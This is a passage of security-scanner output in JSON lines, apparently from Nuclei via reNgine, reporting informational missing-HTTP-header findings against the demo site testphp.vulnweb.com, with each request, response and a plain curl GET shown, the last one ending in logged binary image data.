class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/3.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/color-printer/3/'\\u003eLaser Color Printer HP LaserJet M551dn, A4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/color-printer/3/'\\u003ePrice\\u003cbr\\u003e812 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003c/div\\u003e\\r\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:01.535972248Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:02.21391959Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"path\":\"/cgi-bin/status\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"request\":\"GET /cgi-bin/status HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:02.213946332Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:02.213968517Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:02.730676695Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:02.730758799Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"request\":\"GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:02.730778961Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"path\":\"/pictures/4.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"request\":\"GET /pictures/4.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4615\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:58 GMT\\r\\nEtag: \\\"4dca64a1-1207\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0000\\u0003\\u0006\\u0002\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u00005\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0002\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004\\u0000\\u0012!\\u00051A\\u0013Q\\u0006\\\"aq\\ufffd\\u0014\\ufffd#2B\\ufffd\\ufffdR\\ufffd\\ufffd%3\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u0000\\u001a\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0003\\u0000\\u0002\\u0005\\u0004\\u0006\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0001\\u0006\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0011\\u0012!1A\\u0004\\u0013\\\"2Qq\\u0005a\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\u0014#Rb\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000K4\\ufffd5\\ufffd\\ufffd\\ufffd\\u001d\\ufffdÔ\\u0012I\\ufffd?\\ufffd#Y6\\ufffd\\ufffd^\\ufffds`\\u001f\\ufffd\\ufffd# 2\\ufffd#Ag\\ufffd\\ufffd\\u0026V\\u0016\\u000f\\ufffd\\ufffd\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd02t\\ufffd\\ufffd\\u003e\\u001cnX3P\\ufffdW\\ufffd\\ufffd\\u0000s\\ufffd\\ufffdD\\ufffd-\\ufffd\\ufffd\\ufffd#\\ufffd\\u00268\\ufffd3\\ufffd\\ufffd\\ufffdq\\ufffd\\u0011\\ufffdA\\ufffd4\\t\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd0+\\ufffd\\ufffd\\ufffdF\\ufffd!\\ufffd4\\ufffd\\\"\\ufffd\\ufffd#\\ufffd)c\\ufffd\\u0002\\ufffd\\u001b\\ufffdzTZ\\ufffd\\u0000\\ufffdWo\\u0015\\ufffd\\u003cs\\r\\ufffd\\ufffd\\u00159D\\ufffd\\ufffd\\u0026\\ufffd\\tRտ\\ufffd\\ufffd\\u000b\\ufffdkZ$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u003e\\ufffd{\\ufffdrB\\ufffd2\\ufffd]\\ufffdU]\\ufffdwy \\u001f\\u001d\\ufffd\\ufffd\\ufffd\\u0010~\\ufffd\\r\\u0006\\ufffdK\\ufffd\\ufffdۊ\\ufffdk\\ufffd~\\ufffd\\ufffd\\u0000\\ufffd\\ufffd8\\u000f\\ufffd\\ufffd~fI\\t\\u001b\\ufffd\\u0015D\\u001e\\ufffd\\ufffd\\u0000\\ufffd\\u001d\\u003c\\ufffd+\\u0014(\\ufffd\\u0000\\u0000v\\u0002\\ufffdj\\u0003\\ufffd?(Xi\\ufffd|\\ufffd\\ufffdRZ\\u001e\\ufffdC\\ufffd\\ufffdo\\ufffd.\\u001e)w ! 3n\\u000b\\ufffd\\u0013E\\ufffd\\ufffd\\ufffdagU˔#BX\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd=M\\ufffd\\ufffd\\ufffd\\u001a\\ufffd}\\ufffd\\u0006\\ufffd\\u0002\\ufffd=\\ufffd\\u0000\\ufffd\\u001c\\ufffd\\ufffdca̭I\\ufffd\\ufffd\\ufffd!\\ufffd\\u0003\\u0000\\ufffdN\\ufffdY\\ufffd\\u0019\\ufffd0UdK\\ufffd\\ufffd\\u0008'\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0000\\ufffdm\\ufffd\\ufffd^\\u003e\\ufffdQ\\ufffd\\ufffd\\u0012*\\ufffd\\ufffdQ\\ufffd\\u000f\\u001ac\\u001c\\ufffd\\u0005\\ufffdF\\ufffd\\ufffd\\ufffd*\\ufffd\\\\\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdՆP\\u0007\\u003c~t\\ufffd\\ufffdU\\u0014\\ufffd2\\ufffd\\u003c\\ufffdgz\\ufffd\\ufffd\\u000f$Y\\ufffd\\ufffd\\ufffde\\ufffd\\u0000\\u0006\\ufffd?3\\u0003\\ufffd\\n\\u003cv\\ufffd\\ufffd\\ufffdX\\u000e`U,p\\u0026\\ufffd7\\ufffdC\\u0017\\ufffdcW\\u0006hP3/\\ufffd\\ufffd[=\\ufffd?\\ufffdf\\u001aL\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdʑ\\ufffd\\ufffdr\\ufffd,\\ufffd\\u0015\\ufffd*\\ufffd\\u0008.\\ufffd\\\"\\ufffd$\\ufffd\\u0016{\\ufffd\\u0018=\\\"l\\ufffd\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffdl\\ufffd\\u003c\\ufffdU#\\ufffd\\ufffdI\\ufffdr\\u0000\\ufffdx\\ufffd\\ufffdֶ\\ufffd/\\ufffdA\\ufffd\\u0015\\ufffdC\\ufffd BĒhj\\ufffd-\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffdГ4\\ufffd\\ufffd\\ufffdCL\\ufffd\\u0018\\u0008\\ufffd\\ufffd(\\ufffdh\\ufffd\\u000by\\u001c\\ufffdB\\ufffd\\u0017\\ufffdf\\u0026\\u003cpƱ\\ufffd\\u001a\\ufffd(\\ufffd\\ufffd(\\u0001\\ufffd5\\\\*\\u0005\\n\\ufffdq\\ufffd:\\ufffd\\ufffd\\u001bE\\u0016\\u0026\\\\\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\u0013\\ufffdutg\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\u0019?\\ufffd\\ufffd\\t\\u0014\\ufffd\\ufffd@\\ufffd\\u001e,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd鼓n]/\\ufffd\\ufffd\\ufffdU܄\\ufffd\\ufffd\\ufffdZ\\u0007\\ufffd\\ufffd:[\\ufffdԃdK\\u0004\\ufffd\\ufffde'bHl\\ufffd\\ufffd\\ufffds]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\u000e\\ufffd\\u001c\\ufffdގ\\ufffd9\\ufffd?\\ufffd\\ufffdU\\u0010\\ufffd)\\ufffd\\ufffd\\ufffd:\\ufffd\\u0003+P\\u0004\\ufffd\\ufffdaF\\ufffdX\\ufffd\\u003c\\u001b≩\\ufffd\\ufffd0A\\ufffd\\ufffd\\u0003\\ufffd\\ufffdX]O!\\ufffd\\u001a\\u0003\\ufffd\\ufffd\\ufffdA\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd{\\u001f\\ufffdT6\\ufffdǬgvl\\ufffd\\u001e\\ufffd[\\ufffd\\ufffd\\ufffdX\\u001c\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\u0007=\\ufffd\\ufffd\\ufffdo\\ufffdM\\ufffd\\ufffd/}f\\ufffd\\ufffd\\ufffd\\ufffdW\\ufffd\\u0008n\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u0016\\\"I\\ufffd/A\\u001b\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffduy\\\"\\u0000R\\ufffdŀ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\u001cԺ\\ufffdt\\ufffd\\ufffd\\ufffd,\\u0000孨\\u0011\\ufffdP\\ufffdA\\ufffd\\r\\ufffd\\ufffd\\u001a+3;ч\\ufffd\\ufffdF;T{\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffdV\\ufffd6\\ufffduL\\ufffd\\ufffde\\ufffd\\ufffd\\nۈ,YX\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffdN:.*b@\\ufffd\\ufffd\\ufffd\\ufffdQ5}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007Ցi\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n;\\ufffd\\ufffdד\\ufffdh\\ufffd\\ufffd/\\ufffdӁ\\ufffd\\ufffd\\ufffd9hw\\u001f[\\ufffd\\ufffd\\ufffd\\\\\\\\92_w\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0018\\ufffd\\u000b\\ufffd\\ufffd\\u001f\\ufffd'\\ufffd\\ufffdw3\\ufffd\\ufffd8\\u0001Yop\\u0006ڂ\\ufffdl\\ufffd+C\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdr\\ufffdt`zLV\\ufffdA\\ufffd|\\u001f\\ufffd\\u0003\\ufffd\\ufffd\\u0002;\\u0017\\ufffdD\\ufffdmm\\ufffd\\ufffd\\ufffd\\u000c̾\\ufffd\\ufffd\\ufffd@\\ufffdB7)\\ufffd\\ufffd2\\ufffdH